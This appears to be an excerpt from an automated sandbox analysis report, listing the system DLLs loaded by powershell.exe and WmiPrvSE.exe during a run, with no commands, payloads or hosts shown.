Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: comsvcs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
